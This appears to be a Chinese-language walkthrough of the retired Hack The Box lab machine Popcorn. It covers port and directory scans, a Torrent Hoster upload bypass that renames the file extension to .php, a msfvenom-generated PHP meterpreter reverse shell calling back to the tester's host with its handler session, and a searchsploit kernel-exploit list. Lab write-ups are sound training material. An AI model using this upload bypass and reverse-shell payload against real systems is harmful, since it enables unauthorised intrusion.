HTB Popcorn[Hack The Box HTB靶场]writeup系列4

本题是retire的第四题Popcorn

目录

0x00 靶机情况

0x01 扫描端口

0x02 web目录文件扫描

0x03 get webshell

0x04 提权


0x00 靶机情况

HTB Popcorn[Hack The Box HTB靶场]writeup系列4_第1张图片

本题是linux的靶机,整体看起来难度在3-4之间,比之前的题目有了一些难度,不过做过vulnhub的题目之后,linux的题目基本上怎么做都心里有数了。

0x01 扫描端口

先看下端口扫描情况:

root@kali:~# nmap -T5 -A -v 10.10.10.6                                                                                                                                                                         
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 07:19 EST                                                                                                                                                
NSE: Loaded 151 scripts for scanning.                                                                                                                                                                          
NSE: Script Pre-scanning.                                                                                                                                                                                      
Initiating NSE at 07:19                                                                                                                                                                                        
Completed NSE at 07:19, 0.00s elapsed                                                                                                                                                                          
Initiating NSE at 07:19                                                                                                                                                                                        
Completed NSE at 07:19, 0.00s elapsed                                                                                                                                                                          
Initiating NSE at 07:19                                                                                                                                                                                        
Completed NSE at 07:19, 0.00s elapsed                                                                                                                                                                          
Initiating Ping Scan at 07:19                                                                                                                                                                                  
Scanning 10.10.10.6 [4 ports]                                                                                                                                                                                  
Completed Ping Scan at 07:19, 0.57s elapsed (1 total hosts)                                                                                                                                                    
Initiating Parallel DNS resolution of 1 host. at 07:19                                                                                                                                                         
Completed Parallel DNS resolution of 1 host. at 07:19, 0.14s elapsed                                                                                                                                           
Initiating SYN Stealth Scan at 07:19                                                                                                                                                                           
Scanning 10.10.10.6 [1000 ports]
Discovered open port 22/tcp on 10.10.10.6
Discovered open port 80/tcp on 10.10.10.6
Warning: 10.10.10.6 giving up on port because retransmission cap hit (2).
Completed SYN Stealth Scan at 07:20, 4.20s elapsed (1000 total ports)
Initiating Service scan at 07:20
Scanning 2 services on 10.10.10.6
Completed Service scan at 07:20, 7.05s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.6
Retrying OS detection (try #2) against 10.10.10.6
Initiating Traceroute at 07:20
Completed Traceroute at 07:20, 0.66s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 07:20
Completed Parallel DNS resolution of 2 hosts. at 07:20, 0.25s elapsed
NSE: Script scanning 10.10.10.6.
Initiating NSE at 07:20
Completed NSE at 07:20, 15.17s elapsed
Initiating NSE at 07:20
Completed NSE at 07:20, 2.17s elapsed
Initiating NSE at 07:20
Completed NSE at 07:20, 0.00s elapsed
Nmap scan report for 10.10.10.6
Host is up (0.20s latency).
Not shown: 980 closed ports
PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp    open     http            Apache httpd 2.2.12 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
85/tcp    filtered mit-ml-dev
1067/tcp  filtered instl_boots
1213/tcp  filtered mpc-lifenet
1717/tcp  filtered fj-hdnet
2005/tcp  filtered deslogin
2047/tcp  filtered dls
2222/tcp  filtered EtherNetIP-1
3546/tcp  filtered unknown
5988/tcp  filtered wbem-http
6646/tcp  filtered unknown
8022/tcp  filtered oa-system
8654/tcp  filtered unknown
9010/tcp  filtered sdr
9290/tcp  filtered unknown
10617/tcp filtered unknown
32780/tcp filtered sometimes-rpc23
49160/tcp filtered unknown
55056/tcp filtered unknown
Aggressive OS guesses: Linux 2.6.17 - 2.6.36 (95%), Linux 2.6.32 (95%), Linux 2.4.20 (Red Hat 7.2) (95%), Linux 2.6.17 (95%), Linux 2.6.30 (95%), Linux 2.6.35 (95%), AVM FRITZ!Box FON WLAN 7240 WAP (94%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Android 2.3.5 (Linux 2.6) (94%), Epson WF-2660 printer (94%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.682 days (since Sat Feb  1 14:58:58 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=194 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   446.46 ms 10.10.14.1
2   653.63 ms 10.10.10.6

NSE: Script Post-scanning.
Initiating NSE at 07:20
Completed NSE at 07:20, 0.00s elapsed
Initiating NSE at 07:20
Completed NSE at 07:20, 0.00s elapsed
Initiating NSE at 07:20
Completed NSE at 07:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.44 seconds
           Raw packets sent: 1573 (72.608KB) | Rcvd: 1166 (49.960KB)

我们可以看到提供了两个端口22和80。那就是标准的webshell+提权的做法了,三板斧就直接上了。

0x02 web目录文件扫描

我们看下目录扫描情况:

root@kali:~# dirb http://10.10.10.6

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Feb  2 07:21:22 2020
URL_BASE: http://10.10.10.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.6/ ----
*** Calculating NOT_FOUND code...
+ http://10.10.10.6/.bash_history (CODE:200|SIZE:414)                                                                                                                                                         
+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:286)                                                                                                                                                              
+ http://10.10.10.6/index (CODE:200|SIZE:177)                                                                                                                                                                 
+ http://10.10.10.6/index.html (CODE:200|SIZE:177)                                                                                                                                                            
+ http://10.10.10.6/server-status (CODE:403|SIZE:291)                                                                                                                                                         
+ http://10.10.10.6/test (CODE:200|SIZE:47330)                                                                                                                                                                
==> DIRECTORY: http://10.10.10.6/torrent/                                                                                                                                                                     
                                                                                                                                                                                                              
---- Entering directory: http://10.10.10.6/torrent/ ----
==> DIRECTORY: http://10.10.10.6/torrent/admin/                                                                                                                                                               
+ http://10.10.10.6/torrent/browse (CODE:200|SIZE:9277) 

主要有以下:

  1. http://10.10.10.6/test
  2. http://10.10.10.6/torrent/

 

test是个phpinfo,简单看了一下,出题者的意图应该不是让我们直接攻击php服务

HTB Popcorn[Hack The Box HTB靶场]writeup系列4_第2张图片

0x03 get webshell

进入torrent目录之后,看到如下Torrent Hoster站点:

HTB Popcorn[Hack The Box HTB靶场]writeup系列4_第3张图片

然后去exploitdb上查了一下,应该是在upload文件的地方存在漏洞,没有做文件后缀检查。

但是没有明确的exp给出,所以需要自己尝试一下。

首先注册了一下用户,进入后台,把所有功能都过了一遍之后,发现有两个上传的位置:

  1. torrent文件上传
  2. screenshot文件上传

我用burp测试了一下,发现在screenshot做文件上传的时候,可以直接修改文件名称的后缀为php,具体流程如下:

1、随意上传一个torrent,去百度搜索一个就行

HTB Popcorn[Hack The Box HTB靶场]writeup系列4_第4张图片

2、点击Edit this torrent,选择一个图片文件上传

HTB Popcorn[Hack The Box HTB靶场]writeup系列4_第5张图片 

3、使用burp记录这个过程,并修改文件名的后缀为.php

HTB Popcorn[Hack The Box HTB靶场]writeup系列4_第6张图片

4、接着可以在指定目录下面看到上传的文件

HTB Popcorn[Hack The Box HTB靶场]writeup系列4_第7张图片

5、使用msf生成php的反向连接木马

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f raw > a.png.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30687 bytes

 6、将生成的木马文件,替换到burp里面上传

7、打开msf,建立侦听端口

msf5 > search php/meterpreter_reverse_tcp

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  payload/php/meterpreter_reverse_tcp                   normal  No     PHP Meterpreter, Reverse TCP Inline


msf5 > use payload/php/meterpreter_reverse_tcp
msf5 payload(php/meterpreter_reverse_tcp) > show options 

Module options (payload/php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

msf5 payload(php/meterpreter_reverse_tcp) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf5 payload(php/meterpreter_reverse_tcp) > back
msf5 > use multi/handler
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload ''
[-] The value specified for payload is not valid.
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.20:4444 
msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                      Payload opts
  --  ----                    -------                      ------------
  1   Exploit: multi/handler  php/meterpreter_reverse_tcp  tcp://10.10.14.20:4444

8、在浏览器中点击我们上传的文件,执行木马,获得webshell

msf5 exploit(multi/handler) > [*] Meterpreter session 8 opened (10.10.14.20:4444 -> 10.10.10.6:50803) at 2020-02-02 03:25:37 -0500

msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  8         meterpreter php/linux  www-data (33) @ popcorn  10.10.14.20:4444 -> 10.10.10.6:50803 (10.10.10.6)

msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  8         meterpreter php/linux  www-data (33) @ popcorn  10.10.14.20:4444 -> 10.10.10.6:50803 (10.10.10.6)

msf5 exploit(multi/handler) > sessions 8
[*] Starting interaction with 8...

meterpreter >

0x04 提权

看了一下操作系统的版本:

uname -r
2.6.31-14-generic-pae

在exploitdb中查找了一下,有比较多的相似的exp。

searchsploit "Linux Kernel 2.6."
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                        |  Path
                                                                                                                                                                      | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation                                                                                              | exploits/linux/local/160.c
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator                                                                                                               | exploits/linux/local/154.c
Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow (PoC)                                                                                | exploits/linux/dos/25647.sh
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3)                                                                            | exploits/linux/local/9844.py
Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service                                                                                                       | exploits/linux/dos/686.c
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation                                                                                         | exploits/linux/local/145.c
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)                                                                                                | exploits/linux/local/141.c
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2)                                                                                                | exploits/linux/local/142.c
Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read                                                                                                         | exploits/linux/local/624.c
Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow                                                                                                           | exploits/linux/dos/692.c
Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service                                                                                                        | exploits/linux/dos/685.c
Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service                                                                                                       | exploits/linux/dos/691.c
Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow                                                                                                              | exploits/linux/dos/690.c
Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Local Privilege Escalation                                                                               | exploits/linux/local/25289.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit)                                                                 | exploits/linux/local/19933.rb
Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure                                                                                      | exploits/linux/local/27461.c
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation                          | exploits/linux/local/9545.c
Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)                                                                             | exploits/linux/local/926.c
Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)                                                                                                  | exploits/linux/local/895.c
Linux Kernel 2.4.x/2.6.x - Assembler Inline Function Local Denial of Service                                                                                          | exploits/linux/dos/306.c
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)                                                                                                        | exploits/linux/dos/25287.c
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)                                                                                     | exploits/linux/local/25288.c
Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure                                                                                                | exploits/linux/dos/24777.txt
Linux Kernel 2.4.x/2.6.x - Multiple ISO9660 Filesystem Handling Vulnerabilities                                                                                       | exploits/linux/dos/25234.sh
Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read                                                                                          | exploits/linux/local/24043.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)                                  | exploits/linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)                                                                                                 | exploits/linux/local/33321.c
Linux Kernel 2.6.10 - File Lock Local Denial of Service                                                                                                               | exploits/linux/dos/25322.c
Linux Kernel 2.6.10 - Local Denial of Service                                                                                                                         | exploits/linux/dos/904.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation                                                                                                  | exploits/linux/local/40812.c
Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service                                                                                                     | exploits/linux/dos/998.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation                                                                                       | exploits/linux/local/2031.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)                                                                                         | exploits/linux/local/2004.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2)                                                                                         | exploits/linux/local/2005.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)                                                                                         | exploits/linux/local/2006.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)                                                                                         | exploits/linux/local/2011.sh
Linux Kernel 2.6.17 - 'Sys_Tee' Local Privilege Escalation                                                                                                            | exploits/linux/local/29714.txt
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)                                                                                            | exploits/linux/local/5092.c
Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation                                                                                                             | exploits/linux/local/2013.c
Linux Kernel 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service                                                                                             | exploits/linux/dos/28358.txt
Linux Kernel 2.6.18 - 'move_pages()' Information Leak                                                                                                                 | exploits/linux/local/40810.c
Linux Kernel 2.6.18 < 2.6.18-20 - Local Privilege Escalation                                                                                                          | exploits/linux/local/10613.c
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)                                                                                                         | exploits/linux/local/3587.c
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)                                                                                                         | exploits/linux/local/3595.c
Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow                          | exploits/linux/remote/8556.c
Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service                                                                                                       | exploits/linux/dos/4893.c
Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service                                                                                                 | exploits/linux/dos/30902.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)                                                    | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)                                                       | exploits/linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                                                                          | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)                                                    | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                                                                           | exploits/linux/local/40611.c
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)                                                                                              | exploits/linux/local/5093.c
Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation                   | exploits/linux_x86-64/local/9083.c
Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)                                                                                               | exploits/linux/dos/35957.txt
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation                                                                                    | exploits/linux_x86-64/local/15024.c
Linux Kernel 2.6.27.7-generic/2.6.18/2.6.24-1 - Local Denial of Service                                                                                               | exploits/linux/dos/7454.c
Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service                                                                                                                | exploits/linux/dos/7405.c
Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation                                                                                                | exploits/linux/local/17391.c
Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation                                                                                           | exploits/linux/local/8678.c
Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service                                                                                                             | exploits/linux/dos/274.c
Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)                                                                                                  | exploits/linux/local/9521.c
Linux Kernel 2.6.30 - 'tun_chr_pool()' Null Pointer Dereference                                                                                                       | exploits/linux/dos/33088.txt
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation                                                                                        | exploits/linux/local/9191.txt
Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow                                                                                                     | exploits/linux/dos/33228.txt
Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure                                                                                                         | exploits/linux/local/9352.c
Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure                                                                                                | exploits/linux/local/9513.c
Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service                                                                                               | exploits/linux/dos/10022.c
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation                                                                                       | exploits/linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)                                                                                                         | exploits/linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)                                                                                 | exploits/linux/local/25444.c
Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure                                                                                 | exploits/linux/local/24459.sh
Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow                                                                                                           | exploits/linux/dos/40819.c
Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak                                                                                                                      | exploits/linux_x86-64/local/40811.c
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service                                                                                                            | exploits/linux/dos/14594.py
Linux Kernel 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption                                                                                                | exploits/linux/dos/33886.txt
Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service                                                                                                      | exploits/linux/dos/36425.txt
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite                                                                                                   | exploits/linux/local/15344.c
Linux Kernel 2.6.36 IGMP - Remote Denial of Service                                                                                                                   | exploits/linux/dos/18378.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                                                                                                   | exploits/linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation                                                                              | exploits/linux/local/15704.c
Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service                                                                                                           | exploits/linux/dos/15619.c
Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)                                                                                                              | exploits/linux/dos/16263.c
Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service                                                                                                            | exploits/linux/dos/15622.c
Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak                                                                                            | exploits/linux/local/18080.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)                                                                  | exploits/linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)                                                                                  | exploits/linux/local/35161.c
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation                                                           | exploits/linux/local/1397.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)                                                                                  | exploits/linux/dos/31965.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)                                                                                  | exploits/linux/dos/31966.c
Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation                                                                                    | exploits/linux/local/8673.c
Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service                                                                                                  | exploits/linux/dos/33043.txt
Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service                                                                                               | exploits/linux_x86-64/dos/33585.txt
Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service                                                                                | exploits/linux/dos/33289.txt
Linux Kernel 2.6.x - 'AIO_Free_Ring' Local Denial of Service                                                                                                          | exploits/linux/dos/24804.c
Linux Kernel 2.6.x - 'ISO9660' Denial of Service                                                                                                                      | exploits/linux/dos/28912.txt
Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1)                                                                         | exploits/linux/local/25202.c
Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service                                                                                                | exploits/linux/dos/32384.txt
Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' Null Pointer Dereference Denial of Service                                                                            | exploits/linux/dos/33193.c
Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service                                                                                        | exploits/linux/dos/10017.c
Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service                                                                                             | exploits/linux/dos/35013.c
Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service                                                                                            | exploits/linux/dos/35600.c
Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service                                                                                                     | exploits/linux/dos/32775.txt
Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure                                                                                                 | exploits/linux/local/34987.c
Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service                                                                               | exploits/linux/dos/33635.c
Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)                                                                                                          | exploits/linux/local/33322.c
Linux Kernel 2.6.x - 'posix-timers.c' Null Pointer Dereference Denial of Service                                                                                      | exploits/linux/dos/33148.c
Linux Kernel 2.6.x - 'qdisc_run()' Local Denial of Service                                                                                                            | exploits/linux/dos/32682.c
Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure                                                                                                     | exploits/linux/local/37543.c
Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass                                                                                                            | exploits/linux/local/32829.c
Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure                                                                                              | exploits/linux/local/32805.c
Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service                                                                                                  | exploits/linux/dos/33015.c
Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service                                                                                                     | exploits/linux/dos/1657.asm
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure                                                                                       | exploits/linux/local/30605.c
Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service                                                                                               | exploits/linux/dos/29826.txt
Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service                                                                                                         | exploits/linux/dos/29683.txt
Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass                                                                                                                | exploits/linux/local/34001.c
Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass                                                                                                          | exploits/linux/local/27769.txt
Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation                                                                                            | exploits/linux/dos/32815.c
Linux Kernel 2.6.x - Cryptoloop Information Disclosure                                                                                                                | exploits/linux/local/25707.txt
Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation                                                                                                   | exploits/linux/local/33395.txt
Linux Kernel 2.6.x - File Lock Lease Local Denial of Service                                                                                                          | exploits/linux/dos/26749.c
Linux Kernel 2.6.x - INVALIDATE_INODE_PAGES2 Local Integer Overflow                                                                                                   | exploits/linux/dos/26811.c
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)                                                                                            | exploits/linux/dos/24696.c
Linux Kernel 2.6.x - IPv6 Local Denial of Service                                                                                                                     | exploits/linux/dos/26382.c
Linux Kernel 2.6.x - IPv6_SockGlue.c Null Pointer Dereference Denial of Service                                                                                       | exploits/linux/dos/29781.c
Linux Kernel 2.6.x - KSM Local Denial of Service                                                                                                                      | exploits/linux/dos/35820.c
Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service                                                                                                  | exploits/linux/dos/33592.txt
Linux Kernel 2.6.x - NETLINK_FIB_LOOKUP Local Denial of Service                                                                                                       | exploits/linux/dos/29916.c
Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service                                                                                            | exploits/linux/dos/27925.txt
Linux Kernel 2.6.x - Ptrace Privilege Escalation                                                                                                                      | exploits/linux/local/30604.c
Linux Kernel 2.6.x - SCSI ProcFS Denial of Service                                                                                                                    | exploits/linux/dos/26248.sh
Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service                                                                                                            | exploits/linux/dos/27031.c
Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass                                                                                                         | exploits/linux/local/27766.txt
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                                                                           | exploits/linux/dos/28895.txt
Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service                                                                                                    | exploits/linux/dos/26489.c
Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service                                                                                                   | exploits/linux/dos/26648.c
Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service                                                                                                       | exploits/linux/dos/30080.c
Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service                                                                                                  | exploits/linux/dos/35403.c
Linux Kernel 2.6.x - fs/eventpoll.c epoll Data Structure File Descriptor Local Denial of Service                                                                      | exploits/linux/dos/35404.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation                                                | exploits/linux/local/45516.c
Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic (Denial of Service)                                                                                | exploits/linux/dos/7091.c
Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation                                                                                                        | exploits/linux/local/4756.c
Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure                                                                                                           | exploits/linux/local/9363.c
Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service                                                                                         | exploits/linux/dos/1880.c
